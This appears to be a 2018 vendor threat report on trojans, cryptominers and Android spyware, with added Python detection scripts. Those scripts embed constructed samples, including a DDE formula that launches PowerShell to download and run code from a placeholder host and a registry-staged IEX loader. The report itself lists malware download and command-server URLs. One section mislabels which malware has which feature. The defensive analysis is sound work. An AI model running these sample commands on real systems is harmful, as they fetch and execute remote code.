Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and further mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (such as messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful compromise, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of trojans detected in Q2 were information stealers, we can see another dangerous tendency: cybercriminals' accelerating drive to hunt for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, changing the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and posture.
REQUEST A DEMO
Try Comodo Cybersecurity by speaking with a security consultant to begin the process of setting up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

VISIT COMODO.COM

EUROPE: Comodo Security Solutions Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel +40 332 806 772
ASIA: Comodo Security Solutions Pvt Ltd, Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel +91 44 4562 2800, www.comodo.co.in
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.
About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
The malware downloads a payload to a temporary folder and executes binaries fetched from the following locations:
hxxp://www.iyilikleralemi.com/GtXvlc
hxxp://www.thecyberconxion.com/PUqUUe
hxxp://EliasWessel.com/vu6xGmS
hxxp://mossbeachmusic.de/XuBBN6r
hxxp://airmaxx.rs/wIdY
At the time of writing, only the thecyberconxion.com host was still serving a malware binary (SHA-1: 5974190561e707f63d776e55336841bd871eebdb).
The binary moves itself to C:\Windows\SysWOW64\lanesviewer.exe and creates a service named "lanesviewer" to ensure persistence.
The malware creates the "lanesviewer" service to ensure persistence
After that Emotet begins its real mission: stealing private data from the compromised system and sending it to the cybercriminals' Command & Control server.
The next example is even more cunning, because it abuses popular, legitimate Microsoft software to infect computers.
2.3 Flawed Ammyy RAT attack based on legitimate software

The Flawed Ammyy trojan has a nefarious and diverse history of use in cyberattacks. What is most striking is that it is based on legitimate software called Ammyy Admin. Its history is a prime example of how malicious hackers turn legitimate tools into a thief's tools.
Ammyy Admin is remote desktop software created by the Ammyy Group. It provides an easy way to establish a reliable remote desktop connection, connecting remote computers within seconds without additional installation or configuration work.
The dark side of this tool is that its features ideally suit the purposes of cybercriminals, and unsurprisingly perpetrators adopted it for their malicious activity. Cybercriminals repeatedly compromised the Ammyy Group website and replaced the original Ammyy Admin installer with a bundle containing malware, so every user who downloaded Ammyy Admin became covertly infected. Ammyy Group cleaned up the compromised website, but the attackers infected it again, and this vicious cycle repeated itself. The practical lesson is to verify a downloaded installer against the publisher's code signature or a hash published out of band, since a compromised download site serves the trojanized build over the vendor's own URL.
As the diagram shows, Ammyy Admin was used to spread many types of nefarious malware.
The newest malicious modification of Ammyy Admin is called Flawed Ammyy. It is a remote access trojan (RAT) that appeared in the wild at the beginning of 2016 and got its name from the leaked source code of Ammyy Admin version 3. Flawed Ammyy lets attackers use functions such as remote desktop control, a file system manager, proxy support and audio chat. Cybercriminals take total control of the infected host and can run amok: steal credentials and documents, remove or add files, run applications, install other malware, and so on.
The way Flawed Ammyy was spread in the second quarter deserves special attention, because it used a new trick to infect users. Especially worth noting is that this trick, too, relies on legitimate software, this time Microsoft's.
Flawed Ammyy is delivered to victims through phishing emails with an IQY file attachment, as in the following screenshot.
The phishing email
IQY files are Excel Web Query files: plain-text files that tell Microsoft Excel to fetch data from a URL, so an IQY contains a URL and a few related parameters. Excel downloads whatever the URL returns and loads it directly into the spreadsheet, and if that content is an Excel formula, Excel will evaluate it. Note that Excel shows a security prompt before enabling the data connection and another before launching an external application, so the chain depends on the victim clicking through both.
The malicious IQY contained a malicious URL, so opening it started a chain of malicious files that ended in downloading and running Flawed Ammyy via Windows PowerShell.
Malware runs PowerShell
Thus in this case machines face extremely dangerous and potent malware built from and delivered via legitimate software, which makes it much harder for antivirus software to detect the attack.
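As an added illustration (not code from the report or from any campaign), the following Python script triages an IQY attachment the way an analyst would: it parses the three-line WEB query header, pulls out the URL, and checks whether the content that URL returns is an Excel formula that pipes a command to DDE. The sample IQY and the sample response below are constructed for this example; the host 198.51.100.7 is a documentation address, not an indicator.

```python
"""Triage an Excel Web Query (.iqy) attachment and the content its URL returns."""
import re
from urllib.parse import urlparse

# Constructed sample IQY in the style of the campaign described above (not a real file).
SAMPLE_IQY = "WEB\r\n1\r\nhttp://198.51.100.7/2.dat\r\n\r\nSelection=EntirePage\r\n"

# Constructed sample of what such a URL might return: a formula that abuses DDE to start
# PowerShell. Host and paths are made up for this example.
SAMPLE_RESPONSE = (
    "=cmd|' /c powershell -w hidden -nop -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString(''http://198.51.100.7/1.dat'')\"'!A0\r\n"
)

# A DDE formula starts with = + - or @, names an application, a pipe, and a cell reference after '!'.
DDE_PATTERN = re.compile(r"^\s*[=+\-@].*\|.*!", re.MULTILINE)
LAUNCHER_PATTERN = re.compile(
    r"\b(cmd|powershell|pwsh|mshta|regsvr32|rundll32|wscript|cscript)\b", re.I)


def parse_iqy(text):
    """Return the URL of an IQY file, or None if it is not a WEB query.
    IQY is plain text: a 'WEB' header, a version line, the URL, then optional
    parameter lines such as Selection=... ."""
    lines = [ln.strip() for ln in text.splitlines()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        return None
    return lines[2]


def classify_url(url):
    """Flag plain-HTTP or bare-IP destinations, which legitimate web queries rarely use."""
    p = urlparse(url)
    reasons = []
    if p.scheme != "https":
        reasons.append("unencrypted http")
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", p.hostname or ""):
        reasons.append("bare IP host")
    return reasons


def classify_response(body):
    """Return reasons why fetched content looks like a formula-based launcher."""
    reasons = []
    if DDE_PATTERN.search(body):
        reasons.append("DDE formula (=app|'cmd'!cell)")
    if LAUNCHER_PATTERN.search(body):
        reasons.append("references a command launcher")
    return reasons


def triage(iqy_text, fetched_body=None):
    """Combine file and (optional) response indicators into a verdict."""
    url = parse_iqy(iqy_text)
    if url is None:
        return {"verdict": "not-a-web-query", "url": None, "reasons": []}
    reasons = classify_url(url)
    if fetched_body is not None:
        reasons += classify_response(fetched_body)
    if any("DDE" in r for r in reasons):
        verdict = "malicious"
    elif reasons:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"verdict": verdict, "url": url, "reasons": reasons}


if __name__ == "__main__":
    print(triage(SAMPLE_IQY, SAMPLE_RESPONSE))
```

In a mail gateway you would run `parse_iqy` on the attachment alone and quarantine on `classify_url` hits; the response check belongs in a sandbox, where fetching the URL is safe.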
2.4 The growth of Flawed Ammyy attacks for Q2

[Chart: The growth of Flawed Ammyy attacks for Q2]
2.5 Ammyy Admin dissemination around the world for Q2

As illustrated, trojans became the 800-pound gorilla of the malware market in Q2. This trend will inevitably shift attack vectors toward covert theft and the manipulation of users, a real gift for cybercriminals and a nightmare for users.
Trojans let attackers gain time. Because the malware acts covertly, cybercriminals have more than enough time to use stolen data to their advantage; in many cases attacks are discovered only after money has been withdrawn from a bank account or confidential data has been published. The pairing of trojans as payloads with phishing emails as the means of delivery observed during Q2 will result in a surge in such attacks and victims, and using legitimate tools like PowerShell to run malware will amplify the number of victims even more, because such attacks are much harder for antivirus products to detect.
To fight these attacks, cybersecurity departments need to rearrange their security measures around the new trends above. Combining the best malware detection tools with data protection methods built on defense-in-depth principles offers the most promising solution.
[Chart: monthly detection counts for April, May and June 2018: 43,188; 46,382; 48,881]
3 Cryptominer Evolution

Going Fileless, Killing Competitors, Crashing Systems

Cryptominers do not lead the Q2 malware pack, but that does not mean their impact is greatly diminished. On the contrary, current cryptominer behavior recalls that of an army preparing for battle: training and reprovisioning to fight more efficiently. Cryptominers are developing quickly and gaining dangerous new abilities.
Earlier cryptominers were only able to use an infected machine's resources to mine cryptocurrency on behalf of the attackers. For that reason many users did not regard them as particularly dangerous: cryptominers did not steal information or destroy data as other malware does, but merely consumed CPU resources. Moreover, they typically did not employ strong obfuscation and could be easily discovered and deleted.
But Q2 events clearly showed that the situation has radically changed
New cryptominer samples detected by Comodo malware analysts exhibit far more harmful abilities than mere mining requires. These samples clearly show that cryptominers are transforming into a sophisticated, multifunctional weapon for cybercriminals. They are learning to hide from and fight against antimalware tools: they can camouflage themselves, kill competing cryptominers and even crash user systems when an attempt is made to delete the malware.
3.1 BadShell attacks enterprises

Fileless malware is next-generation malware, especially compared with traditional infection via .exe files. File-based malware resides on the hard drive, which makes it easier to detect. Fileless malware is different: as its name suggests, it is malicious code injected into legitimate OS processes. It need not be installed as a file on the victim machine but runs only in memory, which makes it much harder for antivirus products to detect. In practice the code still has to survive a reboot somewhere, typically in a registry value or a scheduled task, and those persistence artifacts are where detection should focus.
Usually such malware is spread via malicious ad banners. Clicking on a banner redirects the user to an infected website, where the malware covertly installs itself on the victim's computer. As many antivirus tools cannot detect it, users remain unaware of the infection. Not surprisingly, its use by cybercriminals is on the increase.
Last quarter Comodo Threat Research Labs analysts faced just such a scenario. A company with several thousand endpoints was compromised by fileless malware; when its legacy security software failed to protect it, the company turned to Comodo Threat Research Labs for assistance.
Comodo analysts found that the malware was a cryptominer that relied on legitimate Windows components: PowerShell to execute commands, Task Scheduler to ensure persistence and the Registry to hold the malicious binary code. The screenshots below show exactly how the malware, dubbed BadShell, works.
If we decode the PowerShell arguments, we see that the malicious code is stored in the registry. The PowerShell script reads it from there and injects it into an existing running process.
BadShell at work
The malicious code in the registry
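To make the decoding step concrete, here is an added Python example (not the report's or BadShell's code) that decodes the base64/UTF-16LE payload of a PowerShell -EncodedCommand argument and flags the registry-staging pattern described above: read a registry value, base64-decode it, hand it to Invoke-Expression. The command line and the registry key HKLM:\SOFTWARE\Example\Stage are constructed for the example and are not BadShell's indicators.

```python
"""Decode a PowerShell -EncodedCommand argument and flag registry-staged, fileless loaders."""
import base64
import re

# Constructed script in the style described above; the key name is an example, not BadShell's.
SAMPLE_SCRIPT = (
    "$k = 'HKLM:\\SOFTWARE\\Example\\Stage';"
    "$b = (Get-ItemProperty -Path $k -Name Payload).Payload;"
    "IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b)))"
)


def encode_command(script):
    """Produce what an attacker passes to -EncodedCommand: base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_CMDLINE = "powershell.exe -NoP -W Hidden -enc " + encode_command(SAMPLE_SCRIPT)


def _is_encoded_switch(token):
    """True for -e, -en, -enc, ... -encodedcommand (any prefix PowerShell accepts) and -ec."""
    t = token.lower()
    return t == "-ec" or (len(t) >= 2 and t.startswith("-") and "-encodedcommand".startswith(t))


def decode_encoded_command(cmdline):
    """Return the script carried by an -EncodedCommand argument, or None if there is none."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if _is_encoded_switch(tok):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


# Three behaviours that together describe a registry-staged loader. Each alone is common
# in admin scripts; all three in one encoded command is the pattern worth alerting on.
INDICATORS = {
    "reads registry value": re.compile(r"Get-ItemProperty|\bgp\b|Registry::|HK(?:LM|CU):", re.I),
    "base64 decodes data": re.compile(r"FromBase64String", re.I),
    "executes decoded text": re.compile(r"\bIEX\b|Invoke-Expression|\[Reflection\.Assembly\]::Load", re.I),
}


def registry_staging_indicators(script):
    return [name for name, rx in INDICATORS.items() if rx.search(script)]


def analyze_cmdline(cmdline):
    """Decode the command line (if encoded) and report which staging behaviours it shows."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"decoded": None, "indicators": [], "fileless_staging": False}
    hits = registry_staging_indicators(script)
    return {"decoded": script, "indicators": hits, "fileless_staging": len(hits) == len(INDICATORS)}


if __name__ == "__main__":
    print(analyze_cmdline(SAMPLE_CMDLINE))
```

Feed `analyze_cmdline` the command line recorded in Sysmon event 1 or Windows event 4688, or the action of each scheduled task, and alert when `fileless_staging` is true; the decoded text also tells you which registry value to collect before cleaning the host.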
This emergency clearly demonstrates how dangerous cryptominer activity can be. Imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to do their jobs. Comodo analysts took over the situation and cleaned the infection from all affected computers, but of course the company's financial losses were irreversible.
Evading antivirus software and persisting in the system are the most important attributes of a cryptominer, because the longer it runs on the infected system, the more it earns for the attackers. That is why cybercriminals pay special attention to a cryptominer's ability to elude antivirus software.
Below is another cunning technique, one that turns an infected machine into the attacker's hostage.
3.2 WinstarNssmMiner, a system killer

Like other cryptominers, WinstarNssmMiner is designed to steal computer resources to mine cryptocurrency for cybercriminals. But it has a special feature: it can root itself into a system so deeply that it becomes unremovable. Attempting to kill it will bring the target system down completely.
The secret of WinstarNssmMiner's persistence lies in the way it infects a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task, mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.
The malicious code disguised as svchost.exe
Especially impressive is that both infected svchost.exe processes carry the "critical process" attribute, meaning that terminating either of them will crash the system and leave the user with a blue screen. This is the same flag that protects csrss.exe and other core system processes; a process can set it on itself through the undocumented RtlSetProcessIsCritical call, which requires SeDebugPrivilege. The safe way to remove such a miner is therefore not to kill the process but to remove its persistence mechanism and reboot, or to clear the flag before terminating it.
WinstarNssmMiner spreading around the world
Cryptominers can kill not only their victims' systems but also their cryptomining competitors.
3.3 CoinMiner kills rivals

CoinMiner stands out from other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.
CoinMiner kills its rivals as follows
The code below downloads the CoinMiner build for the host's Windows architecture (x86 or x64) and then checks whether a miner is already running by testing for the presence of a process named "AMDDriver64".
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists, named $malwares and $malwares2, of the process names it is instructed to kill. The lists include other types of cryptominers.
In this way CoinMiner gets the victim's computer all to itself, using its resources to mine cryptocurrency.
Some cryptominers have earned the spotlight of the mass media and cybersecurity researchers, which made them easier for users to detect. In Q2 these cryptominers learned to hide; CoinHive is the clearest example.
3.4 CoinHive changes its skin

CoinHive is a popular JavaScript cryptominer: embed its snippet in a web page and every visitor to the site will mine coins for you.
As you can see the CoinHive script is easily detected
The CoinHive script
After many publications on this subject in the mass media and in cybersecurity reports, users started checking website code for cryptominers. But in the second quarter perpetrators found a way around this obstacle: they now use a sneaky trick to camouflage CoinHive's presence with URL shorteners.
As a result the malicious code on a webpage looks like this
The obfuscated malicious code on a webpage
If we decode the string we encounter an iframe
The iframe loads the URL shortener
Notice that the width and height of the iframe are set to 1 to make it as invisible as possible.
Now let's look at the URL https://cnhv.co (cnhv.co is the link-shortening service operated by CoinHive itself: a visitor to a cnhv.co link mines for the link's owner before being redirected).
And there we can find the familiar link to CoinHive
The link to CoinHive
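As an added example, not code from the report or from CoinHive, this Python script reproduces the analyst's decoding step over a constructed page: it finds base64 literals in the HTML, decodes them, and flags any 1x1 or hidden iframe whose source points at cnhv.co or another CoinHive domain. The page and the shortlink path /example are constructed; the domain list is an assumption you would maintain from your own intelligence.

```python
"""Find base64-encoded HTML in a page, decode it, and flag hidden iframes to mining domains."""
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed page: a 1x1 iframe to the CoinHive shortener, written into the DOM from a
# base64 blob, in the style of the obfuscation shown above. The shortlink path is made up.
HIDDEN_IFRAME = ('<iframe src="https://cnhv.co/example" width="1" height="1" '
                 'style="display:none"></iframe>')
SAMPLE_PAGE = (
    "<html><body><h1>News</h1>\n"
    "<script>document.write(atob('"
    + base64.b64encode(HIDDEN_IFRAME.encode()).decode()
    + "'));</script>\n</body></html>"
)

# Assumed watch list of CoinHive domains; extend it from your own intelligence.
MINER_HOSTS = {"cnhv.co", "coinhive.com", "coin-hive.com", "authedmine.com"}

# A quoted run of 24+ base64 characters with optional padding.
B64_BLOB = re.compile(r"['\"]([A-Za-z0-9+/]{24,}={0,2})['\"]")


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})


def decode_blobs(page):
    """Return the decoded text of every base64 literal that decodes to something HTML-like."""
    out = []
    for m in B64_BLOB.finditer(page):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if "<" in text:
            out.append(text)
    return out


def find_hidden_iframes(html):
    """Describe each iframe: is it visually hidden, and does it point at a mining domain?"""
    p = IframeCollector()
    p.feed(html)
    hits = []
    for f in p.iframes:
        w, h = f.get("width", "").strip(), f.get("height", "").strip()
        tiny = (w in ("0", "1") and h in ("0", "1")) or "display:none" in f.get("style", "").replace(" ", "")
        host = (urlparse(f.get("src", "")).hostname or "").lower()
        hits.append({"src": f.get("src", ""), "hidden": tiny, "known_miner": host in MINER_HOSTS})
    return hits


def scan_page(page):
    """Scan the visible HTML plus every decoded blob; return all iframe findings."""
    findings = find_hidden_iframes(page)
    for text in decode_blobs(page):
        findings.extend(find_hidden_iframes(text))
    return findings


if __name__ == "__main__":
    for finding in scan_page(SAMPLE_PAGE):
        print(finding)
```

Decoding before matching is the whole point: a scanner that only greps the raw HTML for "coinhive" or "cnhv.co" sees nothing on this page, while the decoded iframe is unambiguous.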
What is the impact of this trick? In a simple scenario a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the web page's code but doesn't find any sign of a cryptominer, so she concludes that something is wrong with her PC, while CoinHive continues to co-opt her computer to mine cryptocoins.
The next malware in line prefers not to mine cryptocurrency but to steal it on the fly.
3.5 Cryptocurrency clipboard hijacker intercepts transfers

It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but actually steals cryptocurrency, redirecting it to the perpetrator.
Cryptocurrency transfers require a wallet address. An address is a long string of mixed letters and digits, so it is almost impossible to remember or type by hand. That is why users usually copy and paste a wallet address to make a transaction. Cybercriminals regard this copy-paste step as a weakness they can exploit.
The cryptocurrency clipboard hijacker watches the clipboard for a copied wallet address. Upon finding one, it replaces it with the address of a wallet under the attacker's control, so the unwitting owner of the infected machine sends cryptocoins straight into the cybercriminals' hands. The one reliable user-side check is to compare the pasted address character by character with the intended one before confirming a transfer.
New Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses
This malware is distributed bundled with All-Radio 4.27 Portable. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used to spread different types of malware, clipboard cryptocurrency hijackers among them.
Here is an example of a clipboard hijacker attack:
A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
An example of a clipboard hijacker attack
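The following Python example is added here (it is not code from the report) to show the check a defender can build around the copy-paste step: remember what the user actually copied, and alert when the clipboard is read back holding a different, valid-looking wallet address. The replay uses the two addresses from the report's example above; the address formats are matched with regular expressions, the same loose matching a hijacker relies on, so the example also shows how broad that net is. The event sequence is constructed.

```python
"""Detect a clipboard hijacker's swap: copied wallet address != address read back at paste time."""
import re

# Loose format matchers for common wallet address families. A hijacker uses the same kind
# of patterns to decide what to replace; a defender uses them to decide what to compare.
ADDRESS_PATTERNS = {
    "btc-legacy": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),   # Base58, P2PKH/P2SH
    "btc-bech32": re.compile(r"^bc1[ac-hj-np-z02-9]{11,71}$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "ltc": re.compile(r"^[LM][a-km-zA-HJ-NP-Z1-9]{26,33}$"),
    "xmr": re.compile(r"^[48][0-9AB][1-9A-HJ-NP-Za-km-z]{93}$"),
}


def address_kind(text):
    """Return the address family a string looks like, or None."""
    text = text.strip()
    for kind, rx in ADDRESS_PATTERNS.items():
        if rx.match(text):
            return kind
    return None


class ClipboardGuard:
    """Remembers what the user copied and compares it with what the clipboard holds later."""

    def __init__(self):
        self.last_copied = None

    def on_copy(self, text):
        """Called for a copy the user performed (keyboard shortcut or menu), not for writes by other processes."""
        self.last_copied = text.strip()

    def on_read(self, clipboard_text):
        """Return an alert if the clipboard now holds a different wallet address than the user copied."""
        now = clipboard_text.strip()
        if self.last_copied is None or now == self.last_copied:
            return None
        before, after = address_kind(self.last_copied), address_kind(now)
        if before and after:
            return {"alert": "wallet address swapped", "copied": self.last_copied,
                    "clipboard": now, "kind": after}
        return None


def replay(events):
    """Run a sequence of ('copy', text) / ('read', text) events and collect alerts."""
    guard, alerts = ClipboardGuard(), []
    for kind, text in events:
        if kind == "copy":
            guard.on_copy(text)
        else:
            alert = guard.on_read(text)
            if alert:
                alerts.append(alert)
    return alerts


# Constructed replay using the two addresses from the report's example.
SAMPLE_EVENTS = [
    ("copy", "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"),
    ("read", "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"),   # untouched: no alert
    ("read", "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"),   # swapped by the hijacker: alert
    ("copy", "meeting notes"),
    ("read", "meeting notes"),                        # ordinary text: no alert
]

if __name__ == "__main__":
    for alert in replay(SAMPLE_EVENTS):
        print(alert)
```

The guard deliberately ignores any clipboard change that is not address-to-address, because ordinary applications rewrite the clipboard constantly; what never happens legitimately is one valid wallet address silently turning into another between copy and paste.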
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in number, they are coming back in an updated disguise and promise to become a serious new challenge for cybersecurity departments and vendors.
4 Android Devices Under Siege
4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. This is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers: today every smartphone contains a plethora of confidential information about its owner.
If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, cybercriminals are not the only ones hunting for smartphone content: intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.
Today spying is the number one purpose of Android malware. In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks in the graph.
The digital spooks
Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection and hone their tradecraft from version to version.
4.1.1 KevDroid

The first is named KevDroid. It is distributed in three versions:
Version 1: Naver Defender
Version 2: Netease Defender
Version 3: PU
Disguises of KevDroid
The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details and contacts (ID, name, phone numbers and email address of the owner). It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email type) and the photos of contacts. After extracting all the data, the malware encrypts it with AES and sends it to the attackers' server at hxxp://cgalim.com/admin/hr/pu/pu.php?do=upload.
KevDroid records the victim's every phone call, then encrypts the recording and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.
The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity, then sends the video to the attackers' server.
Version 3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts web history, account and contact details and device information.
People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was distributed through the official Google Play store. The spyware was camouflaged as a chat app called Dardesh Instant App, but when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment the spyware constantly kept track of all events on the infected device. Social networks were another means of disseminating the malware.
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts the metadata and makes changes on the victim device.
4.1.2 Zoo Park. The next member of the spy family, Zoo Park, has 4 different versions:
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app. It extracts Accounts and Contacts details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, Network Operator Name, SDK version, OS version, etc.), Call Log details and External Storage content.
The third version is included in spyware named "Spymaster Pro" and can:
Enable and disable the GPS services
Record audio and send it to the Command & Control server
Upload image files
Collect information about the applications installed
Collect browser's data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.
In addition to the abilities of previous versions, it includes some additional tricks:
Extracts photos, audio and videos
Records the screen
Executes shell commands
Records calls
4.1.3 MikeSpy. Some spyware samples specifically hunt for messengers' data, like the next digital spook, MikeSpy.
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend, it delivers a bundle of malicious abilities:
Takes control of the Bluetooth adapter
Extracts data about accounts, contact details and installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminals' server via FTP
4.1.4 Xloader. The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
After infection, Xloader connects to its C&C server and executes the following commands:
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the presence of the following banking applications: comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbs
Extract contacts details
Set Wi-Fi to always on
Version 2 can execute additional commands:
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access a location specified by the attackers
Make recordings
Make calls
4.1.5 Stalker Spy. The next malware in the row is Stalker Spy. As you can see, it's a champion in the number of masks it puts on to deceive users.
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to the usual must-have spyware set, Xloader can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.
4.1.6 Mystery Bot. The next malware is much more than a spy. The first version of Mystery Bot combines spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage; after encryption, the malware deletes the original files. So we can call it "a spy with a 007 license".
Version 1: Adobe Flash Player
Version 2: Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device:
Send_SMS - extract SMS content and send it to the C&C server
Send_USSD - send the USSD to the C&C server
Gethistory - monitor browser history
Start_AllApp - gather info about installed applications
Send_call - set the Intent action to call
Forward_call - forward incoming calls
ResForward_call - reset the forwarded calls
Go_Smsmnd - delete SMS content
Go_GetAlls - get SMS history
Dell_sms - delete SMS content in a conversation
Send_spam - send spam SMS
Start_Inject - call the injector's class
4.1.7 FakeSpy. FakeSpy also has many masks, as you can see in the screenshot:
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server:
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
4.1.8 RedAlert. RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Version 1: EbookReader Update Flash Player Android Update WhatsApp Viber
